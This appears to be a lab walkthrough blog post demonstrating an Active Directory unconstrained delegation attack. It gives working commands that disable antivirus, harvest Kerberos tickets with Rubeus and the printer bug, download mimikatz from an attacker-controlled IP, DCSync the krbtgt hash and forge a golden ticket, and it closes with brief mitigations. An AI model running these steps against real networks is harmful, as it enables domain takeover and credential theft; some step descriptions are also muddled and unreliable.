Practical Demo of the Unconstrained Delegation Attack

There has been many publications out there explaining various ways to attack an unconstrained delegation. This research/post is to practically show how such misconfiguration can be exploited easily and effectively. To further understand this kind of attack, check out the resources at the bottom below.

Let’s get started:

Image for post
Image for post

To perform this kind of attack,

  1. Gain access to a domain controller (DCB) in ForestB.
  2. Monitor for logon event through LSA API with Rubeus.exe: Rubeus.exe.
  3. Use a MS-RPRN.exe to trigger the “printer bug” against DCA.
  4. Trigger the MS-RPRN “printer bug” against a domain controller (e.g. DCA) in ForestA.
  5. Harvest a Ticket Granting Ticket (TGT) with Rubeus.exe.
  6. Perform DCSYNC attack to retrieve the TGT credentials.
  7. Forge a golden ticket.
  8. Domain controller(DCA) in ForestA gets compromised.

Practical Demo:

checking the hostname

we can see we are now logged in to the DB-Server.

Find a computer on the domain that has unrestricted kerberos delegation property set using the command:

Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders

Image for post
Image for post
Error due to GET-ADComputer not being recognised

Lets try to install the Active Directory Module for PowerShell. The AD module is already installed on domain controllers on Windows Server but on member servers, you can add the module as a feature in Server Manager or using PowerShell command below:

get-windowsfeature | where name -like RSAT-AD-PowerShell | Install-WindowsFeature

Image for post
Image for post
Modules installed successfully

Now retry with the previous command to find a computer on the domain that has unrestricted kerberos delegation property:

Get-ADComputer -Filter {(OperatingSystem -like “*windows*server*”) -and (OperatingSystem -notlike “2016”) -and (Enabled -eq “True”)} -Properties * | select Name | ft -HideTableHeaders

Image for post
Image for post
2 servers found

We check if our server DB-SERVER has a TrustedForDelegation set to TRUE. If yes, we can start our attack

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Image for post
Image for post
TrustedForDelegation set to TRUE

Attack time:

Have 2 shells (lets call that shell 1 and shell 2)opened so that you can run Rubeus.exe and MS-RPRN.exe simultaneously.

Image for post
Image for post
2 shells spawned

Disable real time AV monitoring from the shell with command:

Set-MpPreference -DisableRealtimeMonitoring $true

Upload MS-RPRN.exe and Rubeus.exe

Image for post
Image for post
uploading MS-RPRN AND Rubeus.exe

In shell on the left (port 2222) use Rubeus to harvest for TGTs every 3 seconds with the command:

Rubeus.exe harvest /interval:3

Image for post
Image for post
TGT Harvested

and in shell on the right (port 3333) use MS-RPRN to request the TGTs

c:\Users\Public\MS-RPRN.exe \\OPS-CHILDDC.operations.atomic.site \\DB-SERVER.operations.atomic.site

\\OPS-CHILDDC.operations.atomic.site = is the domain controller we want to compromise

\\DB-SERVER.operations.atomic.site = is the machine with delegation enabled that we control.

Image for post
Image for post
Trigger the MS-RPRN

remove spaces from captured hash ticket and save it into a file

Image for post
Image for post
hash file

pass the ticket with Rubeus.exe

Rubeus.exe ptt /ticket:hash

Let’s purge user kerberos ticket without Logoff with command:

klist

Image for post
Image for post
Purge User Kerberos Ticket without Logoff

To perform a DCSync attack, we must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.

Upload mimikatz to target. Remember we already disabled real-time monitoring from the start of our attack

powershell.exe Invoke-WebRequest -Uri ‘http://my-ip-here/mimikatz.exe' -Outfile mimikatz.exe

mimikatz.exe “privilege::debug” “lsadump::dcsync /user:OPERATIONS\krbtgt” exit

Image for post
Image for post
Krbtgt NTLM Hash and SID Extracted

let’s forge a golden ticket
kerberos::golden /User:administrator /domain:OPS-CHILDDC.operations.atomic.site /sid:S-1–5–21–3757735274–1965336150–1982876978 /krbtgt:8e2b8effbf6735b8fb5be206cb3dfead /startoffset:0 /endin:600 /renewmax:10080 /ptt

Image for post
Image for post
Forging a golden ticket

we can now view shared directories on our target domain controller

dir \\OPS-CHILDDC.operations.atomic.site\C$

Image for post
Image for post
share directory(\C$)

Mitigations from Unconstrained Delegation:

You should be able to turn on constraints to limit the SPNs delegation can work for.

Placing privileged users in the Protected Users group will prevent them from being used in delegation and keep their TGTs off these computers after they authenticate. The same goes for the Account, which is sensitive and cannot be a delegate option.

Resources: :

https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

You can also check out our services on:: https://www.inveteckglobal.com/

Ghana’s #1 practical cyber security company https://inveteckglobal.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store